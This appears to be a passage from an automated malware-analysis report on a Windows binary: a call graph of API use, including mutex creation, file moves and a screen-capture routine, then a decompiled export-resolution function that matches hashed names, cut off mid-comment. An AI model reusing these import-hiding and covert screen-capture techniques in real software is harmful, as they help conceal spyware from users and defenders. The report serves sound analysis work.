11679->11434 11681 32ec47d 11680->11681 11710 32e9fee 11681->11710 11684 32e9bf7 2 API calls 11685 32ec49f 11684->11685 11685->11679 11714 32ec340 11685->11714 11688 32e8d86 2 API calls 11688->11679 11690 32eac89 11689->11690 11693 32eade8 11690->11693 11694 32e6171 11693->11694 11695 32eae05 11693->11695 11694->11434 11694->11674 11695->11694 11696 32f36f2 2 API calls 11695->11696 11697 32eae49 11696->11697 11709 32e8d70 RtlAllocateHeap 11697->11709 11699 32eae5d 11699->11694 11700 32f3598 2 API calls 11699->11700 11701 32eae9f 11700->11701 11702 32f04a2 lstrlenW 11701->11702 11703 32eaee0 11702->11703 11704 32ea770 RtlAllocateHeap 11703->11704 11707 32eaeec 11704->11707 11705 32eaf56 11706 32e8d86 2 API calls 11705->11706 11706->11694 11707->11705 11708 32e8d86 2 API calls 11707->11708 11708->11705 11709->11699 11711 32e8f0a memset 11710->11711 11712 32ea002 _vsnwprintf 11711->11712 11713 32ea01f 11712->11713 11713->11684 11715 32ec363 11714->11715 11716 32ec36b memset 11715->11716 11725 32ec3da 11715->11725 11717 32e9f8f 2 API calls 11716->11717 11718 32ec387 11717->11718 11719 32f36f2 2 API calls 11718->11719 11720 32ec3a3 11719->11720 11721 32e9fee 2 API calls 11720->11721 11722 32ec3b9 11721->11722 11723 32e8d41 2 API calls 11722->11723 11724 32ec3c2 MoveFileW 11723->11724 11724->11725 11725->11688 11726->11442 11803 32e1080 11727->11803 11732 32e8d2e 2 API calls 11733 32e2bfe 11732->11733 11734 32e2c31 11733->11734 11735 32e1080 2 API calls 11733->11735 11734->11446 11736 32e2c0c 11735->11736 11815 32eb139 11736->11815 11739 32e8d2e 2 API calls 11740 32e2c25 11739->11740 11741 32e8d86 2 API calls 11740->11741 11741->11734 11925 32ef247 11742->11925 11745 32e5528 11745->11447 11748 32eb6f4 7 API calls 11749 32e52ef 11748->11749 11941 32eb233 11749->11941 11751 32e52fb 11751->11745 11752 32ef159 8 API calls 11751->11752 11753 32e531a 11752->11753 11754 32e9f8f 2 API calls 11753->11754 11755 32e532b 11754->11755 11756 32e9bf7 2 API calls 11755->11756 11757 
32e5344 11756->11757 11758 32e8d41 2 API calls 11757->11758 11760 32e5357 11758->11760 11759 32e536a 11761 32e8d86 2 API calls 11759->11761 11760->11759 11946 32eb156 11760->11946 11763 32e537f 11761->11763 11952 32e4fe8 memset 11763->11952 11799 32eb182 11795->11799 11802 32e6123 11795->11802 11796 32eb1a7 11798 32e8d86 2 API calls 11796->11798 11797 32e8d86 2 API calls 11797->11799 11800 32eb1b2 11798->11800 11799->11796 11799->11797 11801 32e8d86 2 API calls 11800->11801 11801->11802 11802->11451 11804 32e8b74 2 API calls 11803->11804 11805 32e1096 11804->11805 11806 32eb341 11805->11806 11807 32e9acd 2 API calls 11806->11807 11809 32eb361 11807->11809 11808 32f36f2 2 API calls 11808->11809 11809->11808 11810 32eb3ae 11809->11810 11811 32e8d86 2 API calls 11810->11811 11812 32eb3b9 11811->11812 11813 32e8dd5 RtlAllocateHeap 11812->11813 11814 32e2bee 11812->11814 11813->11814 11814->11732 11820 32e90cb 11815->11820 11818 32e2c1a 11818->11739 11821 32e90da 11820->11821 11822 32e9116 11820->11822 11838 32e8d70 RtlAllocateHeap 11821->11838 11822->11818 11828 32eb07e 11822->11828 11824 32e90e4 11824->11822 11839 32e8fd0 11824->11839 11827 32e8d86 2 API calls 11827->11822 11882 32e924b 11828->11882 11832 32eb132 11832->11818 11833 32eb12a 11892 32e947b 11833->11892 11835 32eb098 11835->11832 11835->11833 11836 32e8e04 3 API calls 11835->11836 11888 32e9a1d 11835->11888 11836->11835 11838->11824 11853 32e8d70 RtlAllocateHeap 11839->11853 11841 32e8fe5 11844 32e900d 11841->11844 11848 32e8ff2 11841->11848 11854 32e9521 11841->11854 11842 32e9091 11845 32e8d86 2 API calls 11842->11845 11842->11848 11844->11842 11846 32e905b 11844->11846 11847 32e9521 lstrlenW 11844->11847 11845->11848 11846->11842 11846->11848 11858 32efdb9 11846->11858 11847->11846 11848->11822 11848->11827 11851 32e90ab 11852 32e8d86 2 API calls 11851->11852 11852->11848 11853->11841 11855 32e9541 11854->11855 11856 32f04a2 lstrlenW 11855->11856 11857 32e9565 11856->11857 11857->11844 11873 32e8d70 
RtlAllocateHeap 11858->11873 11860 32e8d86 2 API calls 11862 32eff72 11860->11862 11861 32efddd 11870 32eff4c 11861->11870 11874 32e8d70 RtlAllocateHeap 11861->11874 11865 32e8d86 2 API calls 11862->11865 11864 32efdfd 11864->11870 11875 32e8d70 RtlAllocateHeap 11864->11875 11866 32eff80 11865->11866 11868 32e8d86 2 API calls 11866->11868 11869 32e908a 11866->11869 11868->11869 11869->11842 11869->11851 11870->11860 11871 32efe11 11871->11870 11876 32e8e04 11871->11876 11873->11861 11874->11864 11875->11871 11881 32e8d70 RtlAllocateHeap 11876->11881 11878 32e8e19 11879 32e8d86 2 API calls 11878->11879 11880 32e8e41 11878->11880 11879->11880 11880->11871 11881->11878 11885 32e926e 11882->11885 11883 32e8d70 RtlAllocateHeap 11883->11885 11884 32e93a2 11887 32e8d70 RtlAllocateHeap 11884->11887 11885->11883 11885->11884 11886 32e8d86 2 API calls 11885->11886 11886->11885 11887->11835 11889 32e9a28 11888->11889 11891 32e9a3e 11888->11891 11904 32e8d70 RtlAllocateHeap 11889->11904 11891->11835 11893 32e948a 11892->11893 11903 32e9512 11892->11903 11894 32e94c4 11893->11894 11897 32e8d86 2 API calls 11893->11897 11893->11903 11895 32e94d4 11894->11895 11905 32e95a2 11894->11905 11898 32e8d86 2 API calls 11895->11898 11899 32e94ef 11895->11899 11897->11893 11898->11899 11900 32e9505 11899->11900 11901 32e8d86 2 API calls 11899->11901 11902 32e8d86 2 API calls 11900->11902 11901->11900 11902->11903 11903->11832 11904->11891 11919 32e8d70 RtlAllocateHeap 11905->11919 11907 32e95db 11908 32e960e 11907->11908 11910 32e968c 11907->11910 11918 32e95e5 11907->11918 11920 32e8f58 11908->11920 11911 32f04a2 lstrlenW 11910->11911 11915 32e9684 11911->11915 11912 32eb457 CreateFileW 11917 32e96ef 11912->11917 11913 32e961a 11914 32f04a2 lstrlenW 11913->11914 11914->11915 11915->11912 11916 32e8d86 2 API calls 11916->11918 11917->11916 11918->11895 11919->11907 11921 32f36f2 2 API calls 11920->11921 11924 32e8f71 11921->11924 11922 32e8f9e 11922->11913 11923 32f36f2 2 API calls 
11923->11924 11924->11922 11924->11923 11926 32e52d1 11925->11926 11927 32ef25d 11925->11927 11926->11745 11938 32ec86b 11926->11938 11928 32e9f75 2 API calls 11927->11928 11929 32ef269 11928->11929 11930 32e9f75 2 API calls 11929->11930 11931 32ef278 11930->11931 11931->11926 11932 32ef285 GetModuleHandleA 11931->11932 11933 32ef299 11932->11933 11934 32ef292 GetModuleHandleA 11932->11934 11935 32e8d2e 2 API calls 11933->11935 11934->11933 11936 32ef2a4 11935->11936 11937 32e8d2e 2 API calls 11936->11937 11937->11926 12021 32ec789 11938->12021 11940 32e52e3 11940->11748 11942 32eb247 11941->11942 11943 32eb24d GetLastError 11942->11943 11944 32eb257 GetLastError 11942->11944 11945 32eb264 11943->11945 11944->11945 11945->11751 12036 32e912a 11946->12036 11948 32eb162 11949 32eb168 11948->11949 11950 32eb07e 7 API calls 11948->11950 11949->11759 11953 32e501e 11952->11953 11954 32e5053 11953->11954 12058 32e3034 11953->12058 11956 32ec86b 8 API calls 11954->11956 11966 32e50b8 11954->11966 12022 32e8f0a memset 12021->12022 12023 32ec7ab lstrcpynW 12022->12023 12025 32e9f8f 2 API calls 12023->12025 12026 32ec7e0 12025->12026 12027 32e8d41 2 API calls 12026->12027 12028 32ec815 12027->12028 12029 32e9fee 2 API calls 12028->12029 12030 32ec836 lstrcatW 12029->12030 12034 32ea5f3 12030->12034 12033 32ec85c 12033->11940 12035 32ea5fb CharUpperBuffW 12034->12035 12035->12033 12056 32e8d70 RtlAllocateHeap 12036->12056 12038 32e914b 12039 32e915c lstrcpynW 12038->12039 12046 32e9155 12038->12046 12040 32e91cf 12039->12040 12041 32e917f 12039->12041 12057 32e8d70 RtlAllocateHeap 12040->12057 12043 32eb564 6 API calls 12041->12043 12046->11948 12056->12038 12059 32e3050 12058->12059 12408 32e8d70 RtlAllocateHeap 12386->12408 12388 32e67ba 12389 32e692b 12388->12389 12409 32e8d70 RtlAllocateHeap 12388->12409 12389->11458 12391 32e683a 12392 32e8d86 2 API calls 12391->12392 12393 32e691d 12392->12393 12394 32e8d86 2 API calls 12393->12394 12394->12389 12395 32e8f0a memset 
12396 32e67d4 12395->12396 12396->12389 12396->12391 12396->12395 12397 32ec413 12 API calls 12396->12397 12397->12396 12410 32eab18 12398->12410 12401 32e8d70 RtlAllocateHeap 12401->11464 12403 32eaf7d 12402->12403 12404 32ea770 RtlAllocateHeap 12403->12404 12406 32eafa5 12404->12406 12405 32eb00a 12405->11471 12406->12405 12407 32e8d86 2 API calls 12406->12407 12407->12405 12408->12388 12409->12396 12411 32eacbd 4 API calls 12410->12411 12412 32eab37 12411->12412 12413 32e8d86 2 API calls 12412->12413 12414 32eab15 12412->12414 12413->12414 12414->11462 12414->12401 12416 32eab09 4 API calls 12415->12416 12417 32e59ab 12416->12417 12450 32e5a0d 12417->12450 12451 32eb434 12417->12451 12420 32eac02 6 API calls 12421 32e59d1 12420->12421 12456 32ef5b7 12421->12456 12424 32eb6f4 7 API calls 12425 32e59ef 12424->12425 12425->12450 12463 32ea2a5 12425->12463 12429 32e5a25 12481 32e1486 CreateMutexW 12429->12481 12431 32e5a2a 12432 32ea3a2 6 API calls 12431->12432 12433 32e5a38 12432->12433 12496 32e34a0 12433->12496 12450->11279 12452 32ea202 GetSystemTimeAsFileTime 12451->12452 12453 32eb43f 12452->12453 12454 32eabd3 6 API calls 12453->12454 12455 32e59bf 12454->12455 12455->12420 12457 32ef159 8 API calls 12456->12457 12458 32ef5c9 12457->12458 12459 32ef159 8 API calls 12458->12459 12460 32ef5e2 12459->12460 12560 32ef546 12460->12560 12462 32e59d8 12462->12424 12464 32ea2b6 12463->12464 12466 32e5a17 12464->12466 12574 32e8d70 RtlAllocateHeap 12464->12574 12467 32ea3a2 12466->12467 12468 32ea3c0 12467->12468 12470 32ea418 12468->12470 12475 32ea3c4 12468->12475 12575 32ea2f8 12468->12575 12469 32ea429 12472 32eb233 2 API calls 12469->12472 12469->12475 12470->12469 12581 32e8d70 RtlAllocateHeap 12470->12581 12474 32ea48e 12472->12474 12476 32ea4c9 12474->12476 12477 32ea504 SetThreadPriority 12474->12477 12475->12429 12478 32ea4ed 12476->12478 12479 32e8d86 2 API calls 12476->12479 12477->12475 12480 32e8f0a memset 12478->12480 12479->12478 12480->12475 12482 
32e149f CreateMutexW 12481->12482 12492 32e14ec 12481->12492 12483 32e14b1 12482->12483 12482->12492 12484 32e1080 2 API calls 12483->12484 12485 32e14bb 12484->12485 12486 32e9a1d RtlAllocateHeap 12485->12486 12485->12492 12487 32e14cb 12486->12487 12488 32e8d2e 2 API calls 12487->12488 12489 32e14d8 12488->12489 12582 32e8d70 RtlAllocateHeap 12489->12582 12491 32e14e2 12491->12492 12583 32e8d70 RtlAllocateHeap 12491->12583 12492->12431 12494 32e1503 12494->12492 12584 32e747f 12494->12584 12497 32e34ae 12496->12497 12499 32e34b3 12496->12499 12588 32ecb29 12497->12588 12500 32e3649 12499->12500 12501 32ed224 8 API calls 12500->12501 12503 32e3664 12501->12503 12502 32e366d 12513 32e2e49 12502->12513 12503->12502 12595 32e8d70 RtlAllocateHeap 12503->12595 12505 32e3681 12512 32e368b 12505->12512 12596 32ecea4 12505->12596 12507 32e8d86 2 API calls 12507->12502 12511 32ea3a2 6 API calls 12511->12512 12512->12507 12514 32eab09 4 API calls 12513->12514 12515 32e2e67 12514->12515 12609 32e2d93 12515->12609 12518 32e2d93 3 API calls 12519 32e2e8e 12518->12519 12613 32eab55 12519->12613 12522 32e2ee2 12530 32e41aa 12522->12530 12561 32ef554 12560->12561 12562 32ef590 12560->12562 12573 32e8d70 RtlAllocateHeap 12561->12573 12563 32e9f75 2 API calls 12562->12563 12565 32ef59a 12563->12565 12567 32e9a1d RtlAllocateHeap 12565->12567 12566 32ef565 12569 32ef5b3 12566->12569 12571 32e8d86 2 API calls 12566->12571 12568 32ef5a6 12567->12568 12570 32e8d2e 2 API calls 12568->12570 12569->12462 12570->12569 12572 32ef589 12571->12572 12572->12462 12573->12566 12574->12466 12576 32ea302 12575->12576 12577 32ea327 12576->12577 12578 32e8d86 2 API calls 12576->12578 12579 32ea33d 12576->12579 12580 32e8f0a memset 12577->12580 12578->12577 12579->12468 12580->12579 12581->12469 12582->12491 12583->12494 12585 32e7484 12584->12585 12586 32ef159 8 API calls 12585->12586 12587 32e7496 12586->12587 12587->12492 12589 32ecb40 12588->12589 12590 32e9f8f 2 API calls 12589->12590 12594 
32ecb5f 12589->12594 12591 32ecb6e lstrcmpiW 12590->12591 12592 32ecb84 12591->12592 12593 32e8d41 2 API calls 12592->12593 12593->12594 12594->12499 12595->12505 12604 32ecd19 12596->12604 12599 32ecc83 12600 32e9f8f 2 API calls 12599->12600 12601 32ecca9 12600->12601 12602 32e8d41 2 API calls 12601->12602 12603 32e36e5 12602->12603 12603->12511 12605 32e8f0a memset 12604->12605 12606 32ecd50 12605->12606 12607 32e3697 12606->12607 12608 32ece0a LocalAlloc 12606->12608 12607->12512 12607->12599 12608->12607 12610 32e2d9d 12609->12610 12611 32e2db4 12609->12611 12612 32e8e04 3 API calls 12610->12612 12611->12518 12612->12611 12632 32eab5f 12613->12632 12616 32e9cd0 12618 32e9ce4 12616->12618 12633 32eacbd 4 API calls 12632->12633 12634 32e2e99 12633->12634 12634->12522 12634->12616 13001 32e5f3a 13007 32e8d70 RtlAllocateHeap 13001->13007 13003 32e5fb8 13005 32ea202 GetSystemTimeAsFileTime 13006 32e5f4f 13005->13006 13006->13003 13006->13005 13008 32e5cc4 GetDC 13006->13008 13007->13006 13009 32e5ee4 13008->13009 13010 32e5cf6 CreateCompatibleDC 13008->13010 13011 32e8d86 2 API calls 13009->13011 13010->13009 13012 32e5d07 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 13010->13012 13013 32e5f03 13011->13013 13012->13009 13014 32e5d32 SelectObject 13012->13014 13015 32e8d86 2 API calls 13013->13015 13014->13009 13016 32e5d45 BitBlt GetCursorInfo 13014->13016 13019 32e5f0e 13015->13019 13017 32e5dcb SelectObject 13016->13017 13018 32e5d76 13016->13018 13017->13009 13021 32e5ddf GetObjectW 13017->13021 13018->13017 13020 32e5d7b CopyIcon GetIconInfo GetObjectW DrawIconEx 13018->13020 13022 32e5f1c 13019->13022 13023 32e5f15 DeleteDC 13019->13023 13020->13017 13034 32e8d70 RtlAllocateHeap 13021->13034 13025 32e5f27 13022->13025 13026 32e5f20 DeleteDC 13022->13026 13023->13022 13028 32e5f2b DeleteObject 13025->13028 13029 32e5f32 13025->13029 13026->13025 13027 32e5e48 13027->13009 13030 32e5e54 GetDIBits 13027->13030 13028->13029 13029->13006 13035 32e8d70 
RtlAllocateHeap 13030->13035 13032 32e5e7a 13032->13009 13036 32efc7b 13032->13036 13034->13027 13035->13032 13046 32e8d70 RtlAllocateHeap 13036->13046 13038 32efc9b 13045 32efd33 13038->13045 13047 32f5820 13038->13047 13040 32e8d86 2 API calls 13041 32efd51 13040->13041 13041->13009 13043 32e8e04 3 API calls 13044 32efcc6 13043->13044 13044->13043 13044->13045 13050 32f4c40 13044->13050 13045->13040 13046->13038 13087 32f55e0 13047->13087 13049 32f583c 13049->13044 13051 32f4c51 13050->13051 13052 32f4cfa 13051->13052 13053 32f5f00 memcpy 13051->13053 13064 32f4cae 13051->13064 13052->13044 13053->13064 13054 32f4f99 memcpy 13055 32f4fc6 13054->13055 13055->13052 13058 32f51ad 13055->13058 13069 32f5f00 memcpy 13055->13069 13056 32f4f21 memcpy 13066 32f4ed8 13056->13066 13057 32f4d18 13057->13052 13059 32f5f00 memcpy 13057->13059 13057->13066 13058->13052 13063 32f526f 13058->13063 13074 32f5f00 memcpy 13058->13074 13059->13066 13060 32f534b 13068 32f5356 13060->13068 13076 32f535d 13060->13076 13061 32f5344 13098 32f4180 13061->13098 13062 32f5f00 memcpy 13062->13066 13070 32f5f00 memcpy 13063->13070 13072 32f52c1 13063->13072 13073 32f530a 13063->13073 13064->13052 13064->13057 13071 32f5f00 memcpy 13064->13071 13065 32f5f00 memcpy 13065->13073 13066->13052 13066->13054 13066->13055 13066->13056 13066->13062 13120 32f5990 13068->13120 13069->13055 13070->13072 13071->13057 13072->13052 13072->13065 13073->13052 13073->13060 13073->13061 13078 32f5413 13073->13078 13074->13058 13081 32f5349 13076->13081 13136 32f5af0 13076->13136 13078->13052 13079 32f5f00 memcpy 13078->13079 13080 32f54e4 13079->13080 13080->13044 13081->13052 13081->13078 13082 32f71a0 memcpy 13081->13082 13086 32f53a7 13081->13086 13084 32f53c3 13082->13084 13083 32f5f00 memcpy 13083->13078 13085 32f53cb memset 13084->13085 13084->13086 13085->13086 13086->13083 13088 32f57dd 13087->13088 13089 32f55f5 13087->13089 13088->13049 13089->13088 13092 32f5850 13089->13092 13093 32f585e 
13092->13093 13094 32f57d3 13093->13094 13096 32f5f50 memset 13093->13096 13094->13049 13097 32f89b4 13096->13097 13097->13094 13107 32f41b0 13098->13107 13099 32f42d9 13100 32f4319 13099->13100 13101 32f42f1 memcpy 13099->13101 13106 32f4373 13099->13106 13102 32f4325 memcpy 13100->13102 13103 32f4350 memcpy 13100->13103 13101->13106 13102->13103 13104 32f4349 13102->13104 13103->13106 13104->13103 13105 32f71a0 memcpy 13105->13107 13108 32f4427 13106->13108 13110 32f4401 memcpy 13106->13110 13113 32f43a4 13106->13113 13107->13099 13107->13105 13109 32f5f00 memcpy 13107->13109 13112 32f4278 memcpy 13107->13112 13114 32f6040 memcpy 13107->13114 13111 32f6040 memcpy 13108->13111 13116 32f4464 13108->13116 13109->13107 13110->13108 13111->13116 13112->13107 13113->13081 13114->13107 13115 32f4502 13115->13081 13116->13115 13117 32f71a0 memcpy 13116->13117 13118 32f44f5 13117->13118 13119 32f5f00 memcpy 13118->13119 13119->13115 13126 32f5998 13120->13126 13121 32f5d70 4 API calls 13121->13126 13122 32f5a49 13123 32f5a43 13122->13123 13125 32f5a5f 13122->13125 13129 32f5a9f 13122->13129 13123->13081 13124 32f6f10 memcpy 13124->13126 13128 32f6f10 memcpy 13125->13128 13126->13121 13126->13122 13126->13123 13126->13124 13127 32f5f00 memcpy 13126->13127 13127->13126 13131 32f5a7e 13128->13131 13129->13123 13130 32f6f10 memcpy 13129->13130 13132 32f5ac7 13130->13132 13133 32f5f00 memcpy 13131->13133 13134 32f5f00 memcpy 13132->13134 13135 32f5a8b 13133->13135 13134->13123 13135->13081 13143 32f5af9 13136->13143 13137 32f5d70 4 API calls 13137->13143 13138 32f5cc4 13138->13081 13139 32f5ccb 13140 32f5cda 13139->13140 13144 32f5d1b 13139->13144 13142 32f6f10 memcpy 13140->13142 13141 32f6f10 memcpy 13141->13143 13145 32f5cf9 13142->13145 13143->13137 13143->13138 13143->13139 13143->13141 13146 32f5f00 memcpy 13143->13146 13144->13138 13147 32f6f10 memcpy 13144->13147 13148 32f5f00 memcpy 13145->13148 13146->13143 13149 32f5d43 13147->13149 13151 32f5d06 13148->13151 13150 
32f5f00 memcpy 13149->13150 13150->13138 13151->13081 13156 32e2235 13157 32e9890 2 API calls 13156->13157 13158 32e226c 13157->13158 13159 32ebfd9 2 API calls 13158->13159 13160 32e2284 13159->13160 13161 32e228b 13160->13161 13179 32ec4e2 memset 13160->13179 13163 32e8d86 2 API calls 13161->13163 13171 32e23d5 13163->13171 13164 32e23fc 13166 32e9dc9 2 API calls 13164->13166 13165 32e23f1 13168 32e8d86 2 API calls 13165->13168 13170 32e2409 13166->13170 13167 32e8d86 2 API calls 13167->13171 13168->13164 13169 32e9f8f 2 API calls 13172 32e229b 13169->13172 13171->13164 13171->13165 13171->13167 13172->13161 13172->13169 13173 32eb604 CreateFileW 13172->13173 13174 32e8d86 RtlFreeHeap memset 13172->13174 13175 32e109a 2 API calls 13172->13175 13176 32e9bf7 RtlAllocateHeap lstrcatW 13172->13176 13177 32e8d41 RtlFreeHeap memset 13172->13177 13178 32eb798 memset GetExitCodeProcess 13172->13178 13173->13172 13174->13172 13175->13172 13176->13172 13177->13172 13178->13172 13194 32e8d70 RtlAllocateHeap 13179->13194 13181 32ec509 13182 32e9a5a RtlAllocateHeap 13181->13182 13193 32ec58d 13181->13193 13183 32ec527 13182->13183 13184 32e9a5a RtlAllocateHeap 13183->13184 13185 32ec53a 13184->13185 13186 32e9a5a RtlAllocateHeap 13185->13186 13187 32ec54e 13186->13187 13188 32e9f8f 2 API calls 13187->13188 13189 32ec55b 13188->13189 13190 32e8d41 2 API calls 13189->13190 13191 32ec581 13190->13191 13192 32e9a5a RtlAllocateHeap 13191->13192 13192->13193 13193->13172 13194->13181 14517 32e268d 14519 32e269e 14517->14519 14523 32e26b6 14517->14523 14525 32e7047 14519->14525 14522 32e9dc9 2 API calls 14524 32e26cf 14522->14524 14550 32e2654 14523->14550 14526 32e7069 14525->14526 14541 32e7061 14525->14541 14527 32ebfd9 2 API calls 14526->14527 14528 32e7072 14527->14528 14528->14541 14557 32f0eab 14528->14557 14531 32e708c 14532 32e8d86 2 API calls 14531->14532 14532->14541 14533 32e993a 7 API calls 14534 32e70c2 14533->14534 14535 32e66ae 5 API calls 14534->14535 14534->14541 
14536 32e70d4 14535->14536 14537 32e70f9 14536->14537 14538 32e70e1 14536->14538 14540 32eb604 CreateFileW 14537->14540 14539 32e8d86 2 API calls 14538->14539 14539->14541 14542 32e7107 14540->14542 14541->14523 14543 32e5bab 8 API calls 14542->14543 14549 32e7119 14542->14549 14546 32e7115 14543->14546 14544 32e8d86 2 API calls 14545 32e714b 14544->14545 14547 32e8d86 2 API calls 14545->14547 14548 32eac02 6 API calls 14546->14548 14546->14549 14547->14531 14548->14549 14549->14544 14551 32ebfd9 2 API calls 14550->14551 14552 32e2665 14551->14552 14555 32e2689 14552->14555 14556 32e267c 14552->14556 14568 32eadcc 14552->14568 14553 32e8d86 2 API calls 14553->14555 14555->14522 14556->14553 14558 32f0eba 14557->14558 14559 32f0ef6 14557->14559 14561 32e8d86 2 API calls 14558->14561 14567 32e8d70 RtlAllocateHeap 14559->14567 14562 32f0ec3 14561->14562 14563 32e7086 14562->14563 14564 32e8dd5 RtlAllocateHeap 14562->14564 14563->14531 14563->14533 14565 32f0eda 14564->14565 14565->14563 14566 32efc1c lstrlenW 14565->14566 14566->14563 14567->14562 14569 32eade8 6 API calls 14568->14569 14570 32eade3 14569->14570 14570->14556 13515 32e1e01 13516 32e1e1e 13515->13516 13528 32e1e19 13515->13528 13529 32e9c4c 13516->13529 13518 32e8d86 2 API calls 13520 32e1e77 13518->13520 13521 32e9dc9 2 API calls 13520->13521 13523 32e1e83 13521->13523 13522 32e9acd 2 API calls 13524 32e1e3a 13522->13524 13525 32eb798 2 API calls 13524->13525 13524->13528 13526 32e1e4f 13525->13526 13527 32e8d86 2 API calls 13526->13527 13527->13528 13528->13518 13531 32e9c63 13529->13531 13536 32e8d70 RtlAllocateHeap 13531->13536 13532 32e1e27 13532->13522 13532->13528 13533 32e9ca4 lstrcatA 13534 32e9cb8 lstrcatA 13533->13534 13535 32e9c99 13533->13535 13534->13535 13535->13532 13535->13533 13536->13535 14596 32e1295 14597 32eaaba 4 API calls 14596->14597 14598 32e12ac 14597->14598 14599 32e12d1 14598->14599 14600 32f36f2 2 API calls 14598->14600 14601 32e117d 5 API calls 14599->14601 14600->14599 
14602 32e12fa 14601->14602 14603 32eab8d 4 API calls 14602->14603 14625 32e1306 14602->14625 14604 32e1316 14603->14604 14605 32e7c0e 50 API calls 14604->14605 14633 32e13d4 14604->14633 14607 32e1334 14605->14607 14606 32eb316 4 API calls 14608 32e13eb 14606->14608 14610 32e1371 14607->14610 14612 32eab8d 4 API calls 14607->14612 14623 32e133d 14607->14623 14609 32eb403 5 API calls 14608->14609 14611 32e13f7 14609->14611 14614 32eb316 4 API calls 14610->14614 14802 32e7a4e 14611->14802 14615 32e1368 14612->14615 14617 32e138d 14614->14617 14615->14610 14634 32e6935 14615->14634 14621 32eb403 5 API calls 14617->14621 14618 32e8d86 2 API calls 14618->14625 14619 32e143e 14619->14623 14628 32e110a 8 API calls 14619->14628 14620 32e142c 14626 32e110a 8 API calls 14620->14626 14622 32e1399 14621->14622 14785 32e7cb6 14622->14785 14623->14618 14629 32e1438 14626->14629 14628->14629 14831 32e10ba 14629->14831 14633->14606 14839 32e8d70 RtlAllocateHeap 14634->14839 14636 32e694b 14637 32eab09 4 API calls 14636->14637 14784 32e6e47 14636->14784 14638 32e6960 14637->14638 14840 32efd5a 14638->14840 14643 32e9a5a RtlAllocateHeap 14644 32e6984 14643->14644 14645 32e9a5a RtlAllocateHeap 14644->14645 14646 32e6998 14645->14646 14647 32e69bd 14646->14647 14648 32e9a5a RtlAllocateHeap 14646->14648 14649 32e9a5a RtlAllocateHeap 14647->14649 14648->14647 14650 32e69e2 14649->14650 14866 32ee8c9 14650->14866 14656 32e6a51 14657 32e6a76 14656->14657 14913 32e8d70 RtlAllocateHeap 14656->14913 14659 32e109a 2 API calls 14657->14659 14661 32e6aa5 14659->14661 14660 32e6a62 14660->14657 14914 32ebba6 14660->14914 14918 32eb84b 14661->14918 14665 32e8d41 2 API calls 14666 32e6abf 14665->14666 14667 32e109a 2 API calls 14666->14667 14668 32e6acb 14667->14668 14669 32eb84b 5 API calls 14668->14669 14670 32e6ad6 14669->14670 14671 32e8d41 2 API calls 14670->14671 14672 32e6ae5 14671->14672 14673 32e109a 2 API calls 14672->14673 14674 32e6aed 14673->14674 14675 32eb84b 5 API calls 
14674->14675 14676 32e6af8 14675->14676 14677 32e8d41 2 API calls 14676->14677 14678 32e6b07 14677->14678 14679 32e109a 2 API calls 14678->14679 14680 32e6b13 14679->14680 14681 32eb84b 5 API calls 14680->14681 14682 32e6b1e 14681->14682 14683 32e8d41 2 API calls 14682->14683 14684 32e6b2d 14683->14684 14685 32e6b7f 14684->14685 14686 32e109a 2 API calls 14684->14686 14687 32e109a 2 API calls 14685->14687 14688 32e6b46 14686->14688 14689 32e6b8c 14687->14689 14690 32e9fee 2 API calls 14688->14690 14691 32eb84b 5 API calls 14689->14691 14692 32e6b68 14690->14692 14693 32e6b97 14691->14693 14695 32e8d41 2 API calls 14692->14695 14694 32e8d41 2 API calls 14693->14694 14696 32e6ba6 14694->14696 14697 32e6b71 14695->14697 14698 32e109a 2 API calls 14696->14698 14699 32eb84b 5 API calls 14697->14699 14700 32e6bb2 14698->14700 14699->14685 14701 32eb84b 5 API calls 14700->14701 14702 32e6bbd 14701->14702 14703 32e8d41 2 API calls 14702->14703 14704 32e6bcc 14703->14704 14705 32e109a 2 API calls 14704->14705 14706 32e6bd8 14705->14706 14707 32eb84b 5 API calls 14706->14707 14708 32e6be3 14707->14708 14709 32e8d41 2 API calls 14708->14709 14710 32e6bf2 14709->14710 14711 32e109a 2 API calls 14710->14711 14712 32e6bfe 14711->14712 14713 32eb84b 5 API calls 14712->14713 14714 32e6c09 14713->14714 14715 32e8d41 2 API calls 14714->14715 14716 32e6c18 14715->14716 14717 32e109a 2 API calls 14716->14717 14718 32e6c24 14717->14718 14719 32eb84b 5 API calls 14718->14719 14720 32e6c2f 14719->14720 14721 32e8d41 2 API calls 14720->14721 14722 32e6c3e 14721->14722 14723 32e109a 2 API calls 14722->14723 14724 32e6c4a 14723->14724 14725 32eb84b 5 API calls 14724->14725 14726 32e6c55 14725->14726 14727 32e8d41 2 API calls 14726->14727 14728 32e6c64 14727->14728 14729 32e109a 2 API calls 14728->14729 14730 32e6c70 14729->14730 14731 32eb84b 5 API calls 14730->14731 14732 32e6c7b 14731->14732 14733 32e8d41 2 API calls 14732->14733 14734 32e6c8a 14733->14734 14936 32e8d70 RtlAllocateHeap 
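C-Code - Quality: 100%
// Resolves an export of the module mapped at __ecx by comparing a value computed
// over each export name against __edx, instead of looking the name up directly.
E032EEFB8(void* __ecx, intOrPtr __edx) {
	signed int _v8;
	intOrPtr _v12;
	intOrPtr _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	char _v92;
	intOrPtr _t41;
	signed int _t47;
	signed int _t49;
	signed int _t51;
	void* _t56;
	struct HINSTANCE__* _t58;
	_Unknown_base(*)()* _t59;
	intOrPtr _t60;
	void* _t62;
	intOrPtr _t63;
	void* _t69;
	char _t70;
	void* _t75;
	CHAR* _t80;
	void* _t82;

	_t75 = __ecx;
	_v12 = __edx;
	// 0x3c is e_lfanew in the DOS header; NT headers + 0x78 is the export directory RVA (PE32).
	_t60 =  *((intOrPtr*)(__ecx + 0x3c));
	_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
	if(_t41 == 0) {
		L4:
		return 0;
	}
	// Export directory fields: 0x18 NumberOfNames, 0x1c AddressOfFunctions,
	// 0x20 AddressOfNames, 0x24 AddressOfNameOrdinals.
	_t62 = _t41 + __ecx;
	_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
	_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
	_t63 =  *((intOrPtr*)(_t62 + 0x18));
	_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
	_t47 = 0;
	_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
	_v8 = 0;
	_v16 = _t63;
	if(_t63 == 0) {
		goto L4;
	} else {
		goto L2;
	}
	// Walk the export names until the value E032EE3C8 returns for a name,
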